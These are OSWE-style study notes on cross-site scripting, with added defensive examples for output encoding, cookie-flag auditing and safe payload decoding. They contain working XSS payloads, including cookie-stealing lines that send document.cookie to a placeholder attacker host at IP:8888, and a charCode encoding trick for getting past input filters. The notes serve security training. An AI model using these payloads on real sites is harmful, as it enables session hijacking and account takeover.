OSWE Everything

Cross Site Scripting

Last updated 5 months ago

What is Cross Site Scripting (XSS)

Instead of encoding user-supplied input before writing it into the page, the application treats that input as HTML / JavaScript code, which makes it possible to inject scripts into the website.

In this way an attacker can deliver a script to the victim which, when executed in the victim's browser, can perform any action as the targeted user (e.g. steal their session cookie).
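The root cause described above is the missing encoding step. The following is an added example, not code from the original notes: a reflected "search results" fragment rendered once without encoding (the vulnerable pattern) and once through a small HTML-text encoder (the hardened pattern), with the two probe payloads from this page used as constructed test input. escapeHtml, renderUnsafe, renderSafe and tagsIn are names chosen here, not an API from any library.

```javascript
// Added example: vulnerable vs. hardened rendering of user input in an
// HTML text context. Not part of the original notes.

// Encode the five characters that let user data change HTML structure.
// This is correct for an HTML *text* context only; attribute values,
// URLs and inline JavaScript each need their own context-specific encoding.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: the query is concatenated as markup, so a <script> tag
// or an onerror= handler supplied by the user becomes live HTML.
function renderUnsafe(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened: the query is encoded first, so the browser displays it
// literally and only the template's own <p> tags remain as markup.
function renderSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>`;
}

// List the tag names present in a fragment; used to show what the
// browser would actually parse as elements.
function tagsIn(html) {
  const names = [];
  const re = /<\/?([a-zA-Z][\w-]*)/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    names.push(m[1].toLowerCase());
  }
  return names;
}

// Constructed inputs: the two probe payloads from this page.
const PROBES = [
  '<script>alert(document.domain)</script>',
  '<img src onerror=alert(document.domain)>',
];

for (const probe of PROBES) {
  console.log('unsafe tags:', tagsIn(renderUnsafe(probe)));
  console.log('safe tags  :', tagsIn(renderSafe(probe)));
}
```

Running it shows the unsafe output contains a script or img element from the input, while the safe output only ever contains the template's own p tags. In a real application the encoding comes from the framework's templating engine; the point here is what the encoding must do, not to hand-roll it.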

Video explanation

How to find it

The characters most frequently used to test for XSS injection:

HTML

< > " '

JavaScript

' " { } ;

Default payload

<script>alert(document.domain)</script>

Img payload

<img src onerror=alert(document.domain)>

XSS Cookie Stealer

As mentioned in the previous chapter, an attacker is able to steal the victim's session cookie with Cross Site Scripting (if the cookie is not protected with the HttpOnly flag). Below is a step-by-step description of how an attacker can perform this attack.

Attacker side

python3 -m http.server 8888
<script>window.location.replace("http://IP:8888/a"+document.cookie);</script>
<img src onerror=window.location.replace("http://IP:8888/a"+document.cookie);>
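The condition in the paragraph above (the cookie not carrying HttpOnly) is the thing to check on the defending side. The following is an added example, not code from the original notes: a small Set-Cookie header parser and an audit that reports which of HttpOnly, Secure and SameSite a session cookie is missing. The header strings are constructed samples and the function names (parseSetCookie, auditSessionCookie) are chosen here.

```javascript
// Added example: audit Set-Cookie headers for the flags that limit what a
// cookie-stealing XSS payload can read or where the cookie is sent.
// Not part of the original notes; sample headers are constructed.

// Parse one Set-Cookie header value into the cookie name and an attribute
// map. Attribute names are case-insensitive (RFC 6265), so they are
// lower-cased; flag attributes without a value are stored as true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const name = parts[0].split('=')[0].trim();
  const attrs = {};
  for (const part of parts.slice(1)) {
    const eq = part.indexOf('=');
    const key = (eq === -1 ? part : part.slice(0, eq)).trim().toLowerCase();
    attrs[key] = eq === -1 ? true : part.slice(eq + 1).trim();
  }
  return { name, attrs };
}

// Return findings for a session cookie header. An empty list means the
// cookie is hidden from document.cookie (HttpOnly), never sent over
// plaintext HTTP (Secure) and not sent on cross-site requests (SameSite).
function auditSessionCookie(header) {
  const { name, attrs } = parseSetCookie(header);
  const findings = [];
  if (attrs.httponly !== true) {
    findings.push(`${name}: missing HttpOnly (readable via document.cookie)`);
  }
  if (attrs.secure !== true) {
    findings.push(`${name}: missing Secure (sent over plaintext HTTP)`);
  }
  const sameSite = typeof attrs.samesite === 'string' ? attrs.samesite.toLowerCase() : '';
  if (sameSite !== 'lax' && sameSite !== 'strict') {
    findings.push(`${name}: SameSite not set to Lax or Strict`);
  }
  return findings;
}

// Constructed sample headers: one weak, one hardened.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; Path=/',
  'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
];

for (const header of SAMPLE_HEADERS) {
  const findings = auditSessionCookie(header);
  console.log(header, '->', findings.length ? findings : ['OK']);
}
```

Note what HttpOnly does and does not do: it stops the document.cookie exfiltration shown above, but an injected script can still issue requests from the victim's browser, which sends the cookie automatically. It narrows the impact of an XSS; it does not fix the XSS.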

Payload encoding

Sometimes, as attackers, we have to bypass input filters, which forces us to compress the JavaScript code with JSCompress.

Convert it into CharCode using the following JavaScript code:

function encode_to_javascript(string) {
    var input = string;
    var output = '';
    // charCodeAt() gives the UTF-16 code of each character; join the codes
    // with commas so the result drops straight into String.fromCharCode(...)
    for (var pos = 0; pos < input.length; pos++) {
        output += input.charCodeAt(pos);
        if (pos != (input.length - 1)) {
            output += ",";
        }
    }
    return output;
}

let encoded = encode_to_javascript('insert_minified_javascript');
console.log(encoded);

Execute the encoded payload:

<script>eval(String.fromCharCode(<OUTPUT_FROM_ENCODING>))</script>

https://jscompress.com
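When a CharCode-wrapped payload of the shape shown above turns up in logs or a captured request, the triage question is what it decodes to, and the answer should not come from running it through eval(). The following is an added example, not code from the original notes: the inverse of the encoder above (fromCharCodes), plus a helper that pulls the numeric list out of an eval(String.fromCharCode(...)) wrapper and decodes it to readable source without executing anything. The captured payload is constructed from the page's own default payload; toCharCodes, fromCharCodes and decodeCapturedPayload are names chosen here.

```javascript
// Added example: decode a CharCode-wrapped payload for analysis without
// executing it. Not part of the original notes; the sample is constructed.

// Encode source text to a comma-separated list of UTF-16 codes
// (same result as encode_to_javascript above, written compactly).
function toCharCodes(source) {
  const codes = [];
  for (let i = 0; i < source.length; i++) {
    codes.push(source.charCodeAt(i));
  }
  return codes.join(',');
}

// Inverse: comma-separated codes back to text. Rejects anything that is
// not a list of non-negative integers so garbage cannot reach the decoder.
function fromCharCodes(list) {
  const items = list.split(',').map((s) => s.trim());
  if (items.length === 0 || !items.every((s) => /^\d+$/.test(s))) {
    throw new Error('not a char code list');
  }
  return String.fromCharCode(...items.map(Number));
}

// Extract the argument of eval(String.fromCharCode(...)) from a captured
// payload and decode it. Returns null when the wrapper is not present.
// Nothing here evaluates the decoded text; it is returned for reading.
function decodeCapturedPayload(payload) {
  const m = /eval\(String\.fromCharCode\(([\d,\s]+)\)\)/.exec(payload);
  return m ? fromCharCodes(m[1]) : null;
}

// Constructed capture: the page's default payload body, wrapped the same
// way the notes describe.
const CAPTURED =
  '<script>eval(String.fromCharCode(' +
  toCharCodes('alert(document.domain)') +
  '))</script>';

console.log('captured :', CAPTURED);
console.log('decoded  :', decodeCapturedPayload(CAPTURED));
```

The round trip toCharCodes -> fromCharCodes is exact for any JavaScript string, so the decoded text is the original minified script. The regex only recognises this one wrapper shape; other obfuscation layers need their own decoders, and a wrapper that does not match simply yields null rather than a guess.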